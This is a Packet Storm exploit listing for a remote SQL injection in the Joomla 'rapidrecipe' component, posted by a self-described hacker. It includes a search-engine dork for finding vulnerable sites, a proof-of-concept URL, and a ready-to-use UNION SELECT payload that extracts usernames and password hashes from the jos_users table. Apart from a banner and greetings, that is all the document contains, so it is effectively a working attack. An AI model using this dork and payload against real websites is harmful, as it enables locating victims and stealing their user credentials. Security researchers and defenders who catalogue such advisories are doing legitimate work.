joomlarapidrec-sql.txt

2008-06-09T00:00:00
ID PACKETSTORM:67085
Type packetstorm
Reporter His0k4
Modified 2008-06-09T00:00:00

Description

                                        
                                            `/---------------------------------------------------------------\  
\ /  
/ Joomla Component rapidrecipe Remote SQL injection \  
\ /  
\---------------------------------------------------------------/  
  
  
[*] Author : His0k4 [ALGERIAN HaCkEr]  
  
[*] Dork : inurl:com_rapidrecipe "recipe_id"  
  
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}  
  
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--  
  
  
----------------------------------------------------------------------------  
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...  
[*] Greetings2: http://palcastle.org/cc  
  
`